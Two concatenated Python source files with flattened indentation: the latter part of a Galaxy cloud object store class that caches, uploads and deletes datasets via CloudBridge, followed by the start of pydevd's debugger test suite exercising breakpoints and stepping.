# Debugging code for printing deleted files' stats
# folder, file_name = os.path.split(f[1])
# file_date = time.strftime("%m/%d/%y %H:%M:%S", f[0])
# log.debug("%s. %-25s %s, size %s (deleted %s/%s)" \
# % (i, file_name, convert_bytes(f[2]), file_date, \
# convert_bytes(deleted_amount), convert_bytes(delete_this_much)))
else:
log.debug("Cache cleaning done. Total space freed: %s", convert_bytes(deleted_amount))
return
def _get_bucket(self, bucket_name):
try:
bucket = self.conn.storage.buckets.get(bucket_name)
if bucket is None:
log.debug("Bucket not found, creating a bucket with handle '%s'", bucket_name)
bucket = self.conn.storage.buckets.create(bucket_name)
log.debug("Using cloud ObjectStore with bucket '%s'", bucket.name)
return bucket
except InvalidNameException:
log.exception("Invalid bucket name -- unable to continue")
raise
except Exception:
# These two generic exceptions will be replaced by specific exceptions
# once proper exceptions are exposed by CloudBridge.
log.exception("Could not get bucket '{}'".format(bucket_name))
raise Exception
def _fix_permissions(self, rel_path):
""" Set permissions on rel_path"""
for basedir, _, files in os.walk(rel_path):
umask_fix_perms(basedir, self.config.umask, 0o777, self.config.gid)
for filename in files:
path = os.path.join(basedir, filename)
# Ignore symlinks
if os.path.islink(path):
continue
umask_fix_perms(path, self.config.umask, 0o666, self.config.gid)
def _construct_path(self, obj, base_dir=None, dir_only=None, extra_dir=None, extra_dir_at_root=False, alt_name=None,
obj_dir=False, **kwargs):
# extra_dir should never be constructed from provided data but just
        # make sure there are no shenanigans afoot
if extra_dir and extra_dir != os.path.normpath(extra_dir):
log.warning('extra_dir is not normalized: %s', extra_dir)
raise ObjectInvalid("The requested object is invalid")
# ensure that any parent directory references in alt_name would not
# result in a path not contained in the directory path constructed here
if alt_name:
if not safe_relpath(alt_name):
log.warning('alt_name would locate path outside dir: %s', alt_name)
raise ObjectInvalid("The requested object is invalid")
# alt_name can contain parent directory references, but S3 will not
# follow them, so if they are valid we normalize them out
alt_name = os.path.normpath(alt_name)
rel_path = os.path.join(*directory_hash_id(obj.id))
if extra_dir is not None:
if extra_dir_at_root:
rel_path = os.path.join(extra_dir, rel_path)
else:
rel_path = os.path.join(rel_path, extra_dir)
# for JOB_WORK directory
if obj_dir:
rel_path = os.path.join(rel_path, str(obj.id))
if base_dir:
base = self.extra_dirs.get(base_dir)
return os.path.join(base, rel_path)
# S3 folders are marked by having trailing '/' so add it now
rel_path = '%s/' % rel_path
if not dir_only:
rel_path = os.path.join(rel_path, alt_name if alt_name else "dataset_%s.dat" % obj.id)
return rel_path
def _get_cache_path(self, rel_path):
return os.path.abspath(os.path.join(self.staging_path, rel_path))
def _get_transfer_progress(self):
return self.transfer_progress
def _get_size_in_cloud(self, rel_path):
try:
obj = self.bucket.objects.get(rel_path)
if obj:
return obj.size
except Exception:
log.exception("Could not get size of key '%s' from S3", rel_path)
return -1
def _key_exists(self, rel_path):
exists = False
try:
# A hackish way of testing if the rel_path is a folder vs a file
is_dir = rel_path[-1] == '/'
if is_dir:
keyresult = self.bucket.objects.list(prefix=rel_path)
if len(keyresult) > 0:
exists = True
else:
exists = False
else:
exists = True if self.bucket.objects.get(rel_path) is not None else False
except Exception:
log.exception("Trouble checking existence of S3 key '%s'", rel_path)
return False
if rel_path[0] == '/':
raise
return exists
def _in_cache(self, rel_path):
""" Check if the given dataset is in the local cache and return True if so. """
# log.debug("------ Checking cache for rel_path %s" % rel_path)
cache_path = self._get_cache_path(rel_path)
return os.path.exists(cache_path)
def _pull_into_cache(self, rel_path):
# Ensure the cache directory structure exists (e.g., dataset_#_files/)
rel_path_dir = os.path.dirname(rel_path)
if not os.path.exists(self._get_cache_path(rel_path_dir)):
os.makedirs(self._get_cache_path(rel_path_dir))
# Now pull in the file
file_ok = self._download(rel_path)
self._fix_permissions(self._get_cache_path(rel_path_dir))
return file_ok
def _transfer_cb(self, complete, total):
self.transfer_progress += 10
def _download(self, rel_path):
try:
log.debug("Pulling key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
key = self.bucket.objects.get(rel_path)
# Test if cache is large enough to hold the new file
if self.cache_size > 0 and key.size > self.cache_size:
log.critical("File %s is larger (%s) than the cache size (%s). Cannot download.",
rel_path, key.size, self.cache_size)
return False
if self.use_axel:
log.debug("Parallel pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
ncores = multiprocessing.cpu_count()
url = key.generate_url(7200)
                ret_code = subprocess.call(['axel', '-a', '-n', str(ncores), url])
if ret_code == 0:
return True
else:
log.debug("Pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
self.transfer_progress = 0 # Reset transfer progress counter
with open(self._get_cache_path(rel_path), "w+") as downloaded_file_handle:
key.save_content(downloaded_file_handle)
return True
except Exception:
log.exception("Problem downloading key '%s' from S3 bucket '%s'", rel_path, self.bucket.name)
return False
def _push_to_os(self, rel_path, source_file=None, from_string=None):
"""
Push the file pointed to by ``rel_path`` to the object store naming the key
``rel_path``. If ``source_file`` is provided, push that file instead while
still using ``rel_path`` as the key name.
If ``from_string`` is provided, set contents of the file to the value of
the string.
"""
try:
source_file = source_file if source_file else self._get_cache_path(rel_path)
if os.path.exists(source_file):
if os.path.getsize(source_file) == 0 and (self.bucket.objects.get(rel_path) is not None):
log.debug("Wanted to push file '%s' to S3 key '%s' but its size is 0; skipping.", source_file,
rel_path)
return True
if from_string:
if not self.bucket.objects.get(rel_path):
created_obj = self.bucket.objects.create(rel_path)
created_obj.upload(source_file)
else:
self.bucket.objects.get(rel_path).upload(source_file)
log.debug("Pushed data from string '%s' to key '%s'", from_string, rel_path)
else:
start_time = datetime.now()
log.debug("Pushing cache file '%s' of size %s bytes to key '%s'", source_file,
os.path.getsize(source_file), rel_path)
self.transfer_progress = 0 # Reset transfer progress counter
if not self.bucket.objects.get(rel_path):
created_obj = self.bucket.objects.create(rel_path)
created_obj.upload_from_file(source_file)
else:
self.bucket.objects.get(rel_path).upload_from_file(source_file)
end_time = datetime.now()
log.debug("Pushed cache file '%s' to key '%s' (%s bytes transfered in %s sec)",
source_file, rel_path, os.path.getsize(source_file), end_time - start_time)
return True
else:
log.error("Tried updating key '%s' from source file '%s', but source file does not exist.",
rel_path, source_file)
except Exception:
log.exception("Trouble pushing S3 key '%s' from file '%s'", rel_path, source_file)
return False
def file_ready(self, obj, **kwargs):
"""
A helper method that checks if a file corresponding to a dataset is
ready and available to be used. Return ``True`` if so, ``False`` otherwise.
"""
rel_path = self._construct_path(obj, **kwargs)
# Make sure the size in cache is available in its entirety
if self._in_cache(rel_path):
if os.path.getsize(self._get_cache_path(rel_path)) == self._get_size_in_cloud(rel_path):
return True
log.debug("Waiting for dataset %s to transfer from OS: %s/%s", rel_path,
os.path.getsize(self._get_cache_path(rel_path)), self._get_size_in_cloud(rel_path))
return False
def exists(self, obj, **kwargs):
in_cache = False
rel_path = self._construct_path(obj, **kwargs)
# Check cache
if self._in_cache(rel_path):
in_cache = True
# Check cloud
in_cloud = self._key_exists(rel_path)
# log.debug("~~~~~~ File '%s' exists in cache: %s; in s3: %s" % (rel_path, in_cache, in_s3))
# dir_only does not get synced so shortcut the decision
dir_only = kwargs.get('dir_only', False)
base_dir = kwargs.get('base_dir', None)
if dir_only:
if in_cache or in_cloud:
return True
# for JOB_WORK directory
elif base_dir:
if not os.path.exists(rel_path):
os.makedirs(rel_path)
return True
else:
return False
# TODO: Sync should probably not be done here. Add this to an async upload stack?
if in_cache and not in_cloud:
self._push_to_os(rel_path, source_file=self._get_cache_path(rel_path))
return True
elif in_cloud:
return True
else:
return False
def create(self, obj, **kwargs):
if not self.exists(obj, **kwargs):
# Pull out locally used fields
extra_dir = kwargs.get('extra_dir', None)
extra_dir_at_root = kwargs.get('extra_dir_at_root', False)
dir_only = kwargs.get('dir_only', False)
alt_name = kwargs.get('alt_name', None)
# Construct hashed path
rel_path = os.path.join(*directory_hash_id(obj.id))
# Optionally append extra_dir
if extra_dir is not None:
if extra_dir_at_root:
rel_path = os.path.join(extra_dir, rel_path)
else:
rel_path = os.path.join(rel_path, extra_dir)
# Create given directory in cache
cache_dir = os.path.join(self.staging_path, rel_path)
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
if not dir_only:
rel_path = os.path.join(rel_path, alt_name if alt_name else "dataset_%s.dat" % obj.id)
open(os.path.join(self.staging_path, rel_path), 'w').close()
self._push_to_os(rel_path, from_string='')
def empty(self, obj, **kwargs):
if self.exists(obj, **kwargs):
return bool(self.size(obj, **kwargs) > 0)
else:
raise ObjectNotFound('objectstore.empty, object does not exist: %s, kwargs: %s'
% (str(obj), str(kwargs)))
def size(self, obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
if self._in_cache(rel_path):
try:
return os.path.getsize(self._get_cache_path(rel_path))
except OSError as ex:
log.info("Could not get size of file '%s' in local cache, will try cloud. Error: %s", rel_path, ex)
elif self.exists(obj, **kwargs):
return self._get_size_in_cloud(rel_path)
log.warning("Did not find dataset '%s', returning 0 for size", rel_path)
return 0
def delete(self, obj, entire_dir=False, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
extra_dir = kwargs.get('extra_dir', None)
base_dir = kwargs.get('base_dir', None)
dir_only = kwargs.get('dir_only', False)
obj_dir = kwargs.get('obj_dir', False)
try:
            # Remove temporary data in the JOB_WORK directory
if base_dir and dir_only and obj_dir:
shutil.rmtree(os.path.abspath(rel_path))
return True
# For the case of extra_files, because we don't have a reference to
# individual files/keys we need to remove the entire directory structure
# with all the files in it. This is easy for the local file system,
            # but requires iterating through each individual key in S3 and deleting it.
if entire_dir and extra_dir:
shutil.rmtree(self._get_cache_path(rel_path))
results = self.bucket.objects.list(prefix=rel_path)
for key in results:
log.debug("Deleting key %s", key.name)
key.delete()
return True
else:
# Delete from cache first
os.unlink(self._get_cache_path(rel_path))
# Delete from S3 as well
if self._key_exists(rel_path):
key = self.bucket.objects.get(rel_path)
log.debug("Deleting key %s", key.name)
key.delete()
return True
except Exception:
log.exception("Could not delete key '%s' from cloud", rel_path)
except OSError:
log.exception('%s delete error', self.get_filename(obj, **kwargs))
return False
def get_data(self, obj, start=0, count=-1, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
# Check cache first and get file if not there
if not self._in_cache(rel_path):
self._pull_into_cache(rel_path)
# Read the file content from cache
data_file = open(self._get_cache_path(rel_path), 'r')
data_file.seek(start)
content = data_file.read(count)
data_file.close()
return content
def get_filename(self, obj, **kwargs):
base_dir = kwargs.get('base_dir', None)
dir_only = kwargs.get('dir_only', False)
obj_dir = kwargs.get('obj_dir', False)
rel_path = self._construct_path(obj, **kwargs)
# for JOB_WORK directory
if base_dir and dir_only and obj_dir:
return os.path.abspath(rel_path)
cache_path = self._get_cache_path(rel_path)
# S3 does not recognize directories as files so cannot check if those exist.
# So, if checking dir only, ensure given dir exists in cache and return
# the expected cache path.
# dir_only = kwargs.get('dir_only', False)
# if dir_only:
# if not os.path.exists(cache_path):
# os.makedirs(cache_path)
# return cache_path
# Check if the file exists in the cache first
if self._in_cache(rel_path):
return cache_path
# Check if the file exists in persistent storage and, if it does, pull it into cache
elif self.exists(obj, **kwargs):
if dir_only: # Directories do not get pulled into cache
return cache_path
else:
if self._pull_into_cache(rel_path):
return cache_path
# For the case of retrieving a directory only, return the expected path
# even if it does not exist.
# if dir_only:
# return cache_path
raise ObjectNotFound('objectstore.get_filename, no cache_path: %s, kwargs: %s'
% (str(obj), str(kwargs)))
# return cache_path # Until the upload tool does not explicitly create the dataset, return expected path
def update_from_file(self, obj, file_name=None, create=False, **kwargs):
if create:
self.create(obj, **kwargs)
if self.exists(obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
            # Choose whether to use the dataset file itself or an alternate file
if file_name:
source_file = os.path.abspath(file_name)
# Copy into cache
cache_file = self._get_cache_path(rel_path)
try:
if source_file != cache_file:
# FIXME? Should this be a `move`?
shutil.copy2(source_file, cache_file)
self._fix_permissions(cache_file)
except OSError:
log.exception("Trouble copying source file '%s' to cache '%s'", source_file, cache_file)
else:
source_file = self._get_cache_path(rel_path)
# Update the file on cloud
self._push_to_os(rel_path, source_file)
else:
raise ObjectNotFound('objectstore.update_from_file, object does not exist: %s, kwargs: %s'
% (str(obj), str(kwargs)))
def get_object_url(self, obj, **kwargs):
if self.exists(obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
try:
key = self.bucket.objects.get(rel_path)
return key.generate_url(expires_in=86400) # 24hrs
except Exception:
log.exception("Trouble generating URL for dataset '%s'", rel_path)
return None
def get_store_usage_percent(self):
return 0.0
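# Illustrative only: the shape of the ``config_dict`` that ``Cloud.__init__`` above reads.
# The keys mirror the attributes set in ``__init__``; the values are placeholders rather
# than a real deployment, and this dictionary is not referenced anywhere else.
_EXAMPLE_CONFIG_DICT = {
    'auth': {'access_key': 'AKIA...', 'secret_key': '...'},
    'bucket': {'name': 'my-galaxy-bucket', 'use_reduced_redundancy': False, 'max_chunk_size': 250},
    'connection': {'host': None, 'port': 6000, 'multipart': True, 'is_secure': True, 'conn_path': '/'},
    'cache': {'size': 100, 'path': '/tmp/object_store_cache'},
}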
|
test_debugger.py
|
# coding: utf-8
'''
The idea is that we record the commands sent to the debugger and reproduce them from this script
(so, this works as the client: it spawns the debugger as a separate process and communicates
with it as if it were being driven from the outside).
Note that although this is a Python script, it can spawn the debugged process under Jython, IronPython or CPython.
'''
import time
import pytest
from tests_python import debugger_unittest
from tests_python.debugger_unittest import (CMD_SET_PROPERTY_TRACE, REASON_CAUGHT_EXCEPTION,
REASON_UNCAUGHT_EXCEPTION, REASON_STOP_ON_BREAKPOINT, REASON_THREAD_SUSPEND, overrides, CMD_THREAD_CREATE,
CMD_GET_THREAD_STACK, REASON_STEP_INTO_MY_CODE, CMD_GET_EXCEPTION_DETAILS, IS_IRONPYTHON, IS_JYTHON, IS_CPYTHON,
IS_APPVEYOR, wait_for_condition, CMD_GET_FRAME, CMD_GET_BREAKPOINT_EXCEPTION,
CMD_THREAD_SUSPEND, CMD_STEP_OVER, REASON_STEP_OVER, CMD_THREAD_SUSPEND_SINGLE_NOTIFICATION,
CMD_THREAD_RESUME_SINGLE_NOTIFICATION, REASON_STEP_RETURN, REASON_STEP_RETURN_MY_CODE,
REASON_STEP_OVER_MY_CODE, REASON_STEP_INTO, CMD_THREAD_KILL, IS_PYPY, REASON_STOP_ON_START)
from _pydevd_bundle.pydevd_constants import IS_WINDOWS, IS_PY38_OR_GREATER, IS_PY39_OR_GREATER
from _pydevd_bundle.pydevd_comm_constants import CMD_RELOAD_CODE
import json
import pydevd_file_utils
import subprocess
import threading
from tests_python.debug_constants import IS_PY26
from _pydev_bundle import pydev_log
try:
from urllib import unquote
except ImportError:
from urllib.parse import unquote
from tests_python.debug_constants import * # noqa
pytest_plugins = [
str('tests_python.debugger_fixtures'),
]
try:
xrange
except:
xrange = range
if IS_PY2:
builtin_qualifier = "__builtin__"
else:
builtin_qualifier = "builtins"
@pytest.mark.skipif(not IS_CPYTHON, reason='Test needs gc.get_referrers/reference counting to really check anything.')
def test_case_referrers(case_setup):
with case_setup.test_file('_debugger_case1.py') as writer:
writer.log.append('writing add breakpoint')
writer.write_add_breakpoint(6, 'set_up')
writer.log.append('making initial run')
writer.write_make_initial_run()
writer.log.append('waiting for breakpoint hit')
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.log.append('get frame')
writer.write_get_frame(thread_id, frame_id)
writer.log.append('step over')
writer.write_step_over(thread_id)
writer.log.append('get frame')
writer.write_get_frame(thread_id, frame_id)
writer.log.append('run thread')
writer.write_run_thread(thread_id)
writer.log.append('asserting')
try:
assert 13 == writer._sequence, 'Expected 13. Had: %s' % writer._sequence
except:
writer.log.append('assert failed!')
raise
writer.log.append('asserted')
writer.finished_ok = True
def test_case_2(case_setup):
with case_setup.test_file('_debugger_case2.py') as writer:
writer.write_add_breakpoint(3, 'Call4') # seq = 3
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_get_frame(thread_id, frame_id) # Note: write get frame but not waiting for it to be gotten.
writer.write_add_breakpoint(14, 'Call2')
writer.write_run_thread(thread_id)
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_get_frame(thread_id, frame_id) # Note: write get frame but not waiting for it to be gotten.
writer.write_run_thread(thread_id)
writer.log.append('Checking sequence. Found: %s' % (writer._sequence))
assert 15 == writer._sequence, 'Expected 15. Had: %s' % writer._sequence
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.parametrize(
'skip_suspend_on_breakpoint_exception, skip_print_breakpoint_exception',
(
[['NameError'], []],
[['NameError'], ['NameError']],
[[], []], # Empty means it'll suspend/print in any exception
[[], ['NameError']],
[['ValueError'], ['Exception']],
[['Exception'], ['ValueError']], # ValueError will also suspend/print since we're dealing with a NameError
)
)
def test_case_breakpoint_condition_exc(case_setup, skip_suspend_on_breakpoint_exception, skip_print_breakpoint_exception):
msgs_in_stderr = (
'Error while evaluating expression: i > 5',
'Traceback (most recent call last):',
'File "<string>", line 1, in <module>',
)
# It could be one or the other in PyPy depending on the version.
msgs_one_in_stderr = (
"NameError: name 'i' is not defined",
"global name 'i' is not defined",
)
def _ignore_stderr_line(line):
if original_ignore_stderr_line(line):
return True
for msg in msgs_in_stderr + msgs_one_in_stderr:
if msg in line:
return True
return False
def additional_output_checks(stdout, stderr):
original_additional_output_checks(stdout, stderr)
if skip_print_breakpoint_exception in ([], ['ValueError']):
for msg in msgs_in_stderr:
assert msg in stderr
for msg in msgs_one_in_stderr:
if msg in stderr:
break
else:
raise AssertionError('Did not find any of: %s in stderr: %s' % (
msgs_one_in_stderr, stderr))
else:
for msg in msgs_in_stderr + msgs_one_in_stderr:
assert msg not in stderr
with case_setup.test_file('_debugger_case_breakpoint_condition_exc.py') as writer:
original_ignore_stderr_line = writer._ignore_stderr_line
writer._ignore_stderr_line = _ignore_stderr_line
original_additional_output_checks = writer.additional_output_checks
writer.additional_output_checks = additional_output_checks
writer.write_suspend_on_breakpoint_exception(skip_suspend_on_breakpoint_exception, skip_print_breakpoint_exception)
breakpoint_id = writer.write_add_breakpoint(
writer.get_line_index_with_content('break here'), 'Call', condition='i > 5')
writer.write_make_initial_run()
if skip_suspend_on_breakpoint_exception in ([], ['ValueError']):
writer.wait_for_message(CMD_GET_BREAKPOINT_EXCEPTION)
hit = writer.wait_for_breakpoint_hit()
writer.write_run_thread(hit.thread_id)
if IS_JYTHON:
# Jython will break twice.
if skip_suspend_on_breakpoint_exception in ([], ['ValueError']):
writer.wait_for_message(CMD_GET_BREAKPOINT_EXCEPTION)
hit = writer.wait_for_breakpoint_hit()
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_get_frame(thread_id, frame_id)
msg = writer.wait_for_message(CMD_GET_FRAME)
name_to_value = {}
for var in msg.var:
name_to_value[var['name']] = var['value']
assert name_to_value == {'i': 'int: 6', 'last_i': 'int: 6'}
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(thread_id)
writer.finished_ok = True
def test_case_remove_breakpoint(case_setup):
with case_setup.test_file('_debugger_case_remove_breakpoint.py') as writer:
breakpoint_id = writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_double_remove_breakpoint(case_setup):
with case_setup.test_file('_debugger_case_remove_breakpoint.py') as writer:
breakpoint_id = writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_remove_breakpoint(breakpoint_id)
writer.write_remove_breakpoint(breakpoint_id) # Double-remove (just check that we don't have an error).
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_IRONPYTHON, reason='This test fails once in a while due to timing issues on IronPython, so, skipping it.')
def test_case_3(case_setup):
with case_setup.test_file('_debugger_case3.py') as writer:
writer.write_make_initial_run()
time.sleep(.5)
breakpoint_id = writer.write_add_breakpoint(4, '')
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_get_frame(thread_id, frame_id)
writer.write_run_thread(thread_id)
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_get_frame(thread_id, frame_id)
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(thread_id)
writer.finished_ok = True
def test_case_suspend_thread(case_setup):
with case_setup.test_file('_debugger_case4.py') as writer:
writer.write_make_initial_run()
thread_id = writer.wait_for_new_thread()
writer.write_suspend_thread(thread_id)
while True:
hit = writer.wait_for_breakpoint_hit((REASON_THREAD_SUSPEND, REASON_STOP_ON_BREAKPOINT))
if hit.name == 'sleep':
break # Ok, broke on 'sleep'.
else:
# i.e.: if it doesn't hit on 'sleep', release and pause again.
writer.write_run_thread(thread_id)
time.sleep(.1)
writer.write_suspend_thread(thread_id)
assert hit.thread_id == thread_id
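        # write_evaluate_expression takes a '<thread_id>\t<frame_id>\t<scope>' locator ('LOCAL' scope here);
        # evaluating exit_while_loop() in that frame is what lets the test script leave its busy loop.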
writer.write_evaluate_expression('%s\t%s\t%s' % (hit.thread_id, hit.frame_id, 'LOCAL'), 'exit_while_loop()')
writer.wait_for_evaluation([
[
'<var name="exit_while_loop()" type="str" qualifier="{0}" value="str: ok'.format(builtin_qualifier),
'<var name="exit_while_loop()" type="str" value="str: ok"', # jython
]
])
writer.write_run_thread(thread_id)
writer.finished_ok = True
# Jython has a weird behavior: it seems it has fine-grained locking so that when
# we're inside the tracing other threads don't run (so, we can have only one
# thread paused in the debugger).
@pytest.mark.skipif(IS_JYTHON, reason='Jython can only have one thread stopped at each time.')
def test_case_suspend_all_thread(case_setup):
with case_setup.test_file('_debugger_case_suspend_all.py') as writer:
writer.write_make_initial_run()
main_thread_id = writer.wait_for_new_thread() # Main thread
thread_id1 = writer.wait_for_new_thread() # Thread 1
thread_id2 = writer.wait_for_new_thread() # Thread 2
# Ok, all threads created, let's wait for the main thread to get to the join.
writer.wait_for_thread_join(main_thread_id)
writer.write_suspend_thread('*')
# Wait for 2 threads to be suspended (the main thread is already in a join, so, it can't actually
# break out of it while others don't proceed).
hit0 = writer.wait_for_breakpoint_hit(REASON_THREAD_SUSPEND)
hit1 = writer.wait_for_breakpoint_hit(REASON_THREAD_SUSPEND)
writer.write_evaluate_expression('%s\t%s\t%s' % (hit0.thread_id, hit0.frame_id, 'LOCAL'), 'exit_while_loop(1)')
writer.wait_for_evaluation([
[
'<var name="exit_while_loop(1)" type="str" qualifier="{0}" value="str: ok'.format(builtin_qualifier)
]
])
writer.write_evaluate_expression('%s\t%s\t%s' % (hit1.thread_id, hit1.frame_id, 'LOCAL'), 'exit_while_loop(2)')
writer.wait_for_evaluation('<var name="exit_while_loop(2)" type="str" qualifier="{0}" value="str: ok'.format(builtin_qualifier))
writer.write_run_thread('*')
writer.finished_ok = True
def test_case_5(case_setup):
with case_setup.test_file('_debugger_case56.py') as writer:
breakpoint_id = writer.write_add_breakpoint(2, 'Call2')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_get_frame(thread_id, frame_id)
writer.write_remove_breakpoint(breakpoint_id)
writer.write_step_return(thread_id)
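        # The numeric stop reasons passed to wait_for_breakpoint_hit are pydevd command ids:
        # 107=step into, 108=step over, 109=step return, 111=breakpoint, 127=set next statement.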
hit = writer.wait_for_breakpoint_hit('109')
thread_id = hit.thread_id
frame_id = hit.frame_id
line = hit.line
assert line == 8, 'Expecting it to go to line 8. Went to: %s' % line
writer.write_step_in(thread_id)
hit = writer.wait_for_breakpoint_hit('107')
thread_id = hit.thread_id
frame_id = hit.frame_id
line = hit.line
# goes to line 4 in jython (function declaration line)
assert line in (4, 5), 'Expecting it to go to line 4 or 5. Went to: %s' % line
writer.write_run_thread(thread_id)
assert 15 == writer._sequence, 'Expected 15. Had: %s' % writer._sequence
writer.finished_ok = True
def test_case_6(case_setup):
with case_setup.test_file('_debugger_case56.py') as writer:
writer.write_add_breakpoint(2, 'Call2')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_get_frame(thread_id, frame_id)
writer.write_step_return(thread_id)
hit = writer.wait_for_breakpoint_hit('109')
thread_id = hit.thread_id
frame_id = hit.frame_id
line = hit.line
assert line == 8, 'Expecting it to go to line 8. Went to: %s' % line
writer.write_step_in(thread_id)
hit = writer.wait_for_breakpoint_hit('107')
thread_id = hit.thread_id
frame_id = hit.frame_id
line = hit.line
# goes to line 4 in jython (function declaration line)
assert line in (4, 5), 'Expecting it to go to line 4 or 5. Went to: %s' % line
writer.write_run_thread(thread_id)
        assert 13 == writer._sequence, 'Expected 13. Had: %s' % writer._sequence
writer.finished_ok = True
@pytest.mark.skipif(IS_IRONPYTHON, reason='This test is flaky on IronPython, so, skipping it.')
def test_case_7(case_setup):
# This test checks that we start without variables and at each step a new var is created, but on ironpython,
# the variables exist all at once (with None values), so, we can't test it properly.
with case_setup.test_file('_debugger_case_local_variables.py') as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('Break here'), 'Call')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111')
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_vars('<xml></xml>') # no vars at this point
writer.write_step_over(hit.thread_id)
writer.wait_for_breakpoint_hit('108')
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_vars([
[
'<xml><var name="variable_for_test_1" type="int" qualifier="{0}" value="int%253A 10" />%0A</xml>'.format(builtin_qualifier),
'<var name="variable_for_test_1" type="int" value="int', # jython
]
])
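        # Note on the expected XML: values come back percent-encoded twice in these expectations,
        # so '%253A' decodes to '%3A' and then to ':' (i.e. "int: 10").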
writer.write_step_over(hit.thread_id)
writer.wait_for_breakpoint_hit('108')
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_vars([
[
'<xml><var name="variable_for_test_1" type="int" qualifier="{0}" value="int%253A 10" />%0A<var name="variable_for_test_2" type="int" qualifier="{0}" value="int%253A 20" />%0A</xml>'.format(builtin_qualifier),
'<var name="variable_for_test_1" type="int" value="int%253A 10" />%0A<var name="variable_for_test_2" type="int" value="int%253A 20" />%0A', # jython
]
])
writer.write_run_thread(hit.thread_id)
assert 17 == writer._sequence, 'Expected 17. Had: %s' % writer._sequence
writer.finished_ok = True
def test_case_8(case_setup):
with case_setup.test_file('_debugger_case89.py') as writer:
writer.write_add_breakpoint(10, 'Method3')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111')
writer.write_step_return(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('109', line=15)
writer.write_run_thread(hit.thread_id)
assert 9 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
writer.finished_ok = True
def test_case_9(case_setup):
with case_setup.test_file('_debugger_case89.py') as writer:
writer.write_add_breakpoint(10, 'Method3')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111')
# Note: no active exception (should not give an error and should return no
# exception details as there's no exception).
writer.write_get_current_exception(hit.thread_id)
msg = writer.wait_for_message(CMD_GET_EXCEPTION_DETAILS)
assert msg.thread['id'] == hit.thread_id
assert not hasattr(msg.thread, 'frames') # No frames should be found.
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('108', line=11)
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('108', line=12)
writer.write_run_thread(hit.thread_id)
assert 13 == writer._sequence, 'Expected 13. Had: %s' % writer._sequence
writer.finished_ok = True
def test_case_10(case_setup):
with case_setup.test_file('_debugger_case_simple_calls.py') as writer:
        writer.write_add_breakpoint(2, 'None')  # 'None' or 'Method' should make it hit.
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111')
writer.write_step_return(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('109', line=11)
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('108', line=12)
writer.write_run_thread(hit.thread_id)
assert 11 == writer._sequence, 'Expected 11. Had: %s' % writer._sequence
writer.finished_ok = True
def test_case_11(case_setup):
with case_setup.test_file('_debugger_case_simple_calls.py') as writer:
writer.write_add_breakpoint(2, 'Method1')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=2)
assert hit.name == 'Method1'
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_STEP_OVER, line=3)
assert hit.name == 'Method1'
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_STEP_OVER, line=12) # Reverts to step in
assert hit.name == 'Method2'
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_STEP_OVER, line=13)
assert hit.name == 'Method2'
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_STEP_OVER, line=18) # Reverts to step in
assert hit.name == '<module>'
# Finish with a step over
writer.write_step_over(hit.thread_id)
if IS_JYTHON:
writer.write_run_thread(hit.thread_id)
else:
# Finish with a step over
writer.write_step_over(hit.thread_id)
writer.finished_ok = True
def test_case_12(case_setup):
# Note: In CPython we now ignore the function names, so, we'll stop at the breakpoint in line 2
# regardless of the function name (we decide whether to stop in a line or not through the function
# lines).
with case_setup.test_file('_debugger_case_simple_calls.py') as writer:
writer.write_add_breakpoint(2, '') # Should not be hit: setting empty function (not None) should only hit global.
